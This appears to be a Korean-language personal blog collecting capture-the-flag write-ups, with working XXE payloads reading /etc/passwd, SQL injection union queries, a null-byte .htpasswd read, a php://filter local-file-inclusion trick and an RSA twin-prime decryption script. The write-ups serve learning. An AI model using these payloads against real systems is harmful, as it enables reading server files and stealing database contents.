shpik's world!

[Solveme] Give me a link

보호되어 있는 글입니다.
내용을 보시려면 비밀번호를 입력하세요.

[Nuit du hack XV Qual] No Pain No Gain - 75 pts

0x400 CTF

No Pain No Gain

 Challenge validated!

Description

Uploading a CSV file that will be processed to HTML. The purpose of this challenge is to catch the flag file.


Details

Points
75
Category
Web
Validations
81
Url
http://nopainnogain.quals.nuitduhack.com/

Attachments

This challenge has no attachment.


주말에 Nuitduhack CTF에 참가하였습니다.


이 문제 페이지는 아래와 같습니다.


Please upload a CSV file like this:
<!-- Invitations --> 
id,name,email 
1,name1,email1@mail.com 
2,name2,email2@mail.com
Select file
Submit


위와 같이 단순한 구성입니다.


이제 csv를 위의 예제와 같이 만들어 업로드를 해보았습니다.

<!-- Invitations -->
id,name,email
1,name1,email1@mail.com
2,name2,email2@mail.com 
IDNameEmail
1name1email1@mail.com
2name2

email2@mail.com


위와 같은 결과가 나옴을 확인할 수 있다.


이제 다음과 같이 업로드를 하면 에러를 확인할 수 있다.

<!-- Invitations -->
id,name,email
<code>,name1,email1@mail.com
2,name2,email2@mail.com 

Could not convert the CSV to XML!
Please follow the example above.


업로드 된 CSV은 XML로 변경되어지고 변경된 XML을 파싱하여 화면에 보여주는 문제이다.


이제 XXE 취약점을 이용하여 플래그를 구하였다.


<!DOCTYPE root[<!ENTITY foo SYSTEM "file:///etc/passwd">]>
id,name,email
1,name1,&foo;
2,name2,email2@mail.com
IDNameEmail
1name1root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin systemd-timesync:x:100:103:systemd Time Synchronization,,,:/run/systemd:/bin/false systemd-network:x:101:104:systemd Network Management,,,:/run/systemd/netif:/bin/false systemd-resolve:x:102:105:systemd Resolver,,,:/run/systemd/resolve:/bin/false systemd-bus-proxy:x:103:106:systemd Bus Proxy,,,:/run/systemd:/bin/false flag:x:1000:1000::/home/flag:/bin/sh
2name2email2@mail.com


flag라는 유저가 존재하였고, /home/flag/flag에 존재하리라 예측하여 아래와 같은 csv파일을 업로드하였다.

<!DOCTYPE root[<!ENTITY foo SYSTEM "file:///home/flag/flag">]>
id,name,email
1,name1,&foo;
2,name2,email2@mail.com
IDNameEmail
1name1

NDH{U3VwZXIgTWFyaW8gQnJvcw0K44K544O844OR44O844Oe44Oq44Kq44OW44Op44K244O844K6DQpTxatwxIEgTWFyaW8gQnVyYXrEgXp1DQrYs9mI2KjYsdmF2KfYsdmK2Yg=}

2name2email2@mail.com




Flag is 

NDH{U3VwZXIgTWFyaW8gQnJvcw0K44K544O844OR44O844Oe44Oq44Kq44OW44Op44K244O844K6DQpTxatwxIEgTWFyaW8gQnVyYXrEgXp1DQrYs9mI2KjYsdmF2KfYsdmK2Yg=}


gdb

분류없음

gdb2

gdb

gdb

보호되어 있는 글입니다.
내용을 보시려면 비밀번호를 입력하세요.

[SECCON 2016] uncomfortable web - 300pts

0x400 CTF


uncomfortable web

300 points

uncomfortable web
Attack to http://127.0.0.1:81/authed/ through the uploaded script at http://uncomfortableweb.pwn.seccon.jp/.
Get the flag in the database!


주말에 SECCON CTF가 열렸지만, 시험 기간이고해서 그냥 즐기는 용도로 문제를 풀었다.


문제의 페이지는 다음과 같다.



sample파일들의 내용은 전부 127.0.0.1:81로 연결하는 코드이다.

sample1.sh을 예로 보면 다음과 같다.

# sample1.sh #!/bin/sh curl http://127.0.0.1:81/

이를 업로드 하면 다음과같은 화면을 보여준다.


<!-- Output -->

% Total % Received % Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed 0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0 100 903 100 903 0 0 1651k 0 --:--:-- --:--:-- --:--:-- 881k <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"> <html> <head> <title>Index of /</title> </head> <body> <h1>Index of /</h1> <table><tr><th><img src="/icons/blank.gif" alt="[ICO]"></th><th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a></th></tr><tr><th colspan="5"><hr></th></tr> <tr><td valign="top"><img src="/icons/folder.gif" alt="[DIR]"></td><td><a href="authed/">authed/</a></td><td align="right">28-Nov-2016 10:51 </td><td align="right"> - </td><td>&nbsp;</td></tr> <tr><td valign="top"><img src="/icons/text.gif" alt="[TXT]"></td><td><a href="select.cgi">select.cgi</a></td><td align="right">28-Nov-2016 10:08 </td><td align="right">612 </td><td>&nbsp;</td></tr> <tr><th colspan="5"><hr></th></tr> </table> <address>Apache Server at 127.0.0.1 Port 81</address> </body></html>


authed라는 폴더와 select.cgi라는 파일이 존재함을 알 수 있는데, authed폴더는 아래와 같이 권한 없음을 알 수 있다.



#!/bin/sh curl http://127.0.0.1:81/authed


select.cgi를 열면 다음과 같다.

#!/bin/sh curl http://127.0.0.1:81/select.cgi

#!/bin/sh curl http://127.0.0.1:81/select.cgi?txt=a


#!/bin/sh curl http://127.0.0.1:81/select.cgi?txt=.htaccess%00


#!/bin/sh curl http://127.0.0.1:81/select.cgi?txt=.htpasswd%00


John the ripper를 통해 crack하면 패스워드가 test라는 것을 알 수 있다.

이를 통해 authed에 접근이 가능해진다.

#!/bin/sh curl http://127.0.0.1:81/authed/ --user keigo:test



a,b,c라는 txt파일과 sqlinj라는 솔더가 존재함을 알 수 있다.

sqlinj에 접근을 해보자.

#!/bin/sh

curl http://127.0.0.1:81/authed/sqlinj/ --user keigo:test


위와 같이 1.cgi부터 사진에는 안나오지만 100.cgi까지 존재 함을 알 수 있다.

우선 1.cgi를 열어 확인해보면 다음과 같다.

#!/bin/sh curl http://127.0.0.1:81/authed/sqlinj/1.cgi --user keigo:test


뭔가 no에 인젝션이 될거같이 생겼다.

그래서 아래와 같은 스크립트를 돌려놓았다.

#!/usr/bin/python import os for i in range(1,101): print os.system('curl -vv "http://127.0.0.1:81/authed/sqlinj/'+str(i)+'.cgi?no=\'%20or%20\'1%20--" --user keigo:test')



72.cgi의 no 파라미터를 통해 sql injection이 가능함을 확인하였고, flag를 찾기 시작하였다.

#!/bin/sh curl "http://127.0.0.1:81/authed/sqlinj/72.cgi?no='%20union%20select%201,2,3%20--" --user keigo:test


#!/bin/sh curl "http://127.0.0.1:81/authed/sqlinj/72.cgi?no='%20union%20select%20sql,2,3%20from%20sqlite_master%20--" --user keigo:test


#!/bin/sh curl "http://127.0.0.1:81/authed/sqlinj/72.cgi?no='%20union%20select%20f1ag,2,3%20from%20f1ags%20--" --user keigo:test




Flag is

[ SECCON{I want to eventually make a CGC web edition... someday...} ]

[Web] Point Lotto - 130pts

보호되어 있는 글입니다.
내용을 보시려면 비밀번호를 입력하세요.

[Rookies] echo2 - 50pts

보호되어 있는 글입니다.
내용을 보시려면 비밀번호를 입력하세요.

보호되어 있는 글입니다.
내용을 보시려면 비밀번호를 입력하세요.

[Crypto] Twin Prime - 50pts

0x400 CTF/0x401 MMA 1st 2015


Problem

Decrypt it.
twin-primes.7z

Flag

#Your ScoreScoreYour RatingsTeams
15050
x 1 2 3 4 5
183



# encrypt.py
from Crypto.Util.number import *
import Crypto.PublicKey.RSA as RSA
import os

N = 1024

def getTwinPrime(N):
    while True:
        p = getPrime(N)
        if isPrime(p+2):
            return p

def genkey(N = 1024):
    p = getTwinPrime(N)
    q = getTwinPrime(N)
    n1 = p*q
    n2 = (p+2)*(q+2)
    e = long(65537)
    d1 = inverse(e, (p-1)*(q-1))
    d2 = inverse(e, (p+1)*(q+1))
    key1 = RSA.construct((n1, e, d1))
    key2 = RSA.construct((n2, e, d2))
    if n1 < n2:
        return (key1, key2)
    else:
        return (key2, key1)

rsa1, rsa2 = genkey(N)

with open("flag", "r") as f:
    flag = f.read()
padded_flag = flag + "\0" + os.urandom(N/8 - 1 - len(flag))

c = bytes_to_long(padded_flag)
c = rsa1.encrypt(c, 0)[0]
c = rsa2.encrypt(c, 0)[0]

with open("key1", "w") as f:
    f.write("%d\n" % rsa1.n)
    f.write("%d\n" % rsa1.e)
with open("key2", "w") as f:
    f.write("%d\n" % rsa2.n)
    f.write("%d\n" % rsa2.e)

with open("encrypted", "w") as f:
    f.write("%d\n" % c)


n1 = p*q

n2 = p*q + 2( p+q ) + 4

2( p+q ) = n2 - p*q - 4

p+q = ( n2 - n1 - 4 )/2


(p-1)*(q-1) in d1.

= p*q - ( p+q ) + 1


(p+1)*(q+1) in d1.

= p*q + ( p+q ) + 1


# twin_prime.py
from Crypto.Util.number import *
import Crypto.PublicKey.RSA as RSA
import os

n1 = 19402643768027967294480695361037227649637514561280461352708420192197328993512710852087871986349184383442031544945263966477446685587168025154775060178782897097993949800845903218890975275725416699258462920097986424936088541112790958875211336188249107280753661467619511079649070248659536282267267928669265252935184448638997877593781930103866416949585686541509642494048554242004100863315220430074997145531929128200885758274037875349539018669336263469803277281048657198114844413236754680549874472753528866434686048799833381542018876362229842605213500869709361657000044182573308825550237999139442040422107931857506897810951
n2 = 19402643768027967294480695361037227649637514561280461352708420192197328993512710852087871986349184383442031544945263966477446685587168025154775060178782897097993949800845903218890975275725416699258462920097986424936088541112790958875211336188249107280753661467619511079649070248659536282267267928669265252935757418867172314593546678104100129027339256068940987412816779744339994971665109555680401467324487397541852486805770300895063315083965445098467966738905392320963293379345531703349669197397492241574949069875012089172754014231783160960425531160246267389657034543342990940680603153790486530477470655757947009682859
e = long(65537)

p_q = (n2-n1-4)/2
phi_n1 = n1-p_q+1
phi_n2 = n1+p_q+1

d1 = inverse(e, phi_n1)
d2 = inverse(e, phi_n2)

key1 = RSA.construct((n1,e,d1))
key2 = RSA.construct((n2,e,d2))

c = 7991219189591014572196623817385737879027208108469800802629706564258508626010674513875496029177290575819650366802730803283761137036255380767766538866086463895539973594615882321974738140931689333873106124459849322556754579010062541988138211176574621668101228531769828358289973150393343109948611583609219420213530834364837438730411379305046156670015024547263019932288989808228091601206948741304222197779808592738075111024678982273856922586615415238555211148847427589678238745186253649783665607928382002868111278077054871294837923189536714235044041993541158402943372188779797996711792610439969105993917373651847337638929


c = key2.decrypt(c)
c = key1.decrypt(c)
c = long_to_bytes(c)
print c
'''
shpik@shpik:/ctf/MMA/crypt$ python twin_primes.py 
TWCTF{3102628d7059fa267365f8c37a0e56cf7e0797ef}
 ࠝ髀	0ݔм5듲E$K
麗hj@殁¾؈'(喠ﻫ¬a걅Ƅm¶ZLʔa

'''


'0x400 CTF > 0x401 MMA 1st 2015' 카테고리의 다른 글

[Crypto] Twin Prime - 50pts  (0) 2016.09.05
[Web] Global Page - 50pts  (0) 2016.09.05
[Web] Get the admin password! - 100pts  (0) 2016.09.05
[Web] Mortal Magi Agents - 300pts  (0) 2015.09.09
[Web] Login as admin! - 30pts  (0) 2015.09.08

[Web] Global Page - 50pts

0x400 CTF/0x401 MMA 1st 2015

Problem

This problem is not available now.
[09/03 01:14 +00:00] fixed.

Welcome to TokyoWesterns' CTF!

Flag

#Your ScoreScoreYour RatingsTeams
15050
x 1 2 3 4 5
195




shpik@shpik:/ctf/MMA/web/gap$ curl http://globalpage.chal.ctf.westerns.tokyo/?page=tokyo

<!doctype html>

<html>

<head>

<meta charset=utf-8>

<title>Global Page</title>

<style>

.rtl {

  direction: rtl;

}

</style>

</head>


<body>

<br />

<b>Notice</b>:  Undefined index: HTTP_ACCEPT_LANGUAGE in <b>/var/www/globalpage/index.php</b> on line <b>36</b><br />

<p>

<br />

<b>Warning</b>:  include(tokyo/.php): failed to open stream: No such file or directory in <b>/var/www/globalpage/index.php</b> on line <b>41</b><br />

<br />

<b>Warning</b>:  include(): Failed opening 'tokyo/.php' for inclusion (include_path='.:/usr/share/php:/usr/share/pear') in <b>/var/www/globalpage/index.php</b> on line <b>41</b><br />

</p>

</body>

</html>


HTTP_ACCEPT_LANGUAGE is file name.

and page is directory.



So i expect include $page.'/'.'HEADER HTTP_ACCEPT_LANGUAGE's value'




shpik@shpik:/ctf/MMA/web/gap$ curl 'http://globalpage.chal.ctf.westerns.tokyo/?page=php:' -H "Accept-Language:/filter/convert.base64-encode/resource=index"

<!doctype html>

<html>

<head>

<meta charset=utf-8>

<title>Global Page</title>

<style>

.rtl {

  direction: rtl;

}

</style>

</head>


<body>

<p>

PD9waHAKaWYgKCFkZWZpbmVkKCdJTkNMVURFRF9JTkRFWCcpKSB7CmRlZmluZSgnSU5DTFVERURfSU5ERVgnLCB0cnVlKTsKaW5pX3NldCgnZGlzcGxheV9lcnJvcnMnLCAxKTsKaW5jbHVkZSAiZmxhZy5waHAiOwo/Pgo8IWRvY3R5cGUgaHRtbD4KPGh0bWw+CjxoZWFkPgo8bWV0YSBjaGFyc2V0PXV0Zi04Pgo8dGl0bGU+R2xvYmFsIFBhZ2U8L3RpdGxlPgo8c3R5bGU+Ci5ydGwgewogIGRpcmVjdGlvbjogcnRsOwp9Cjwvc3R5bGU+CjwvaGVhZD4KCjxib2R5Pgo8P3BocAokZGlyID0gIiI7CmlmKGlzc2V0KCRfR0VUWydwYWdlJ10pKSB7CgkkZGlyID0gc3RyX3JlcGxhY2UoWycuJywgJy8nXSwgJycsICRfR0VUWydwYWdlJ10pOwp9CgppZihlbXB0eSgkZGlyKSkgewo/Pgo8dWw+Cgk8bGk+PGEgaHJlZj0iLz9wYWdlPXRva3lvIj5Ub2t5bzwvYT48L2xpPgoJPGxpPjxkZWw+V2VzdGVybnM8L2RlbD48L2xpPgoJPGxpPjxhIGhyZWY9Ii8/cGFnZT1jdGYiPkNURjwvYT48L2xpPgo8L3VsPgo8P3BocAp9CmVsc2UgewoJZm9yZWFjaChleHBsb2RlKCIsIiwgJF9TRVJWRVJbJ0hUVFBfQUNDRVBUX0xBTkdVQUdFJ10pIGFzICRsYW5nKSB7CgkJJGwgPSB0cmltKGV4cGxvZGUoIjsiLCAkbGFuZylbMF0pOwo/Pgo8cDw/PSgkbD09PSdoZScpPyIgY2xhc3M9cnRsIjoiIj8+Pgo8P3BocAoJCWluY2x1ZGUgIiRkaXIvJGwucGhwIjsKPz4KPC9wPgo8P3BocAoJfQp9Cj8+CjwvYm9keT4KPC9odG1sPgo8P3BocAp9Cj8+Cg==</p>

</body>

</html>



okey i get index.php with php://filter !


<!-- index.php --> <?php if (!defined('INCLUDED_INDEX')) { define('INCLUDED_INDEX', true); ini_set('display_errors', 1); include "flag.php"; ?> <!doctype html> <html> <head> <meta charset=utf-8> <title>Global Page</title> <style> .rtl { direction: rtl; } </style> </head> <body> <?php $dir = ""; if(isset($_GET['page'])) { $dir = str_replace(['.', '/'], '', $_GET['page']); } if(empty($dir)) { ?> <ul> <li><a href="/?page=tokyo">Tokyo</a></li> <li><del>Westerns</del></li> <li><a href="/?page=ctf">CTF</a></li> </ul> <?php } else { foreach(explode(",", $_SERVER['HTTP_ACCEPT_LANGUAGE']) as $lang) { $l = trim(explode(";", $lang)[0]); ?> <p<?=($l==='he')?" class=rtl":""?>> <?php include "$dir/$l.php"; ?> </p> <?php } } ?> </body> </html> <?php } ?>

maybe i get flag.php's source for getting flag.


shpik@shpik:/ctf/MMA/web/gap$ curl 'http://globalpage.chal.ctf.westerns.tokyo/?page=php:' -H "Accept-Language:/filter/convert.base64-encode/resource=flag"

<!doctype html>

<html>

<head>

<meta charset=utf-8>

<title>Global Page</title>

<style>

.rtl {

  direction: rtl;

}

</style>

</head>


<body>

<p>

PD9waHAKJGZsYWcgPSAiVFdDVEZ7SV9mb3VuZF9zaW1wbGVfTEZJfSI7Cg==</p>

</body>

</html>



Flag is

[ TWCTF{I_found_simple_LFI} ]



'0x400 CTF > 0x401 MMA 1st 2015' 카테고리의 다른 글

[Crypto] Twin Prime - 50pts  (0) 2016.09.05
[Web] Global Page - 50pts  (0) 2016.09.05
[Web] Get the admin password! - 100pts  (0) 2016.09.05
[Web] Mortal Magi Agents - 300pts  (0) 2015.09.09
[Web] Login as admin! - 30pts  (0) 2015.09.08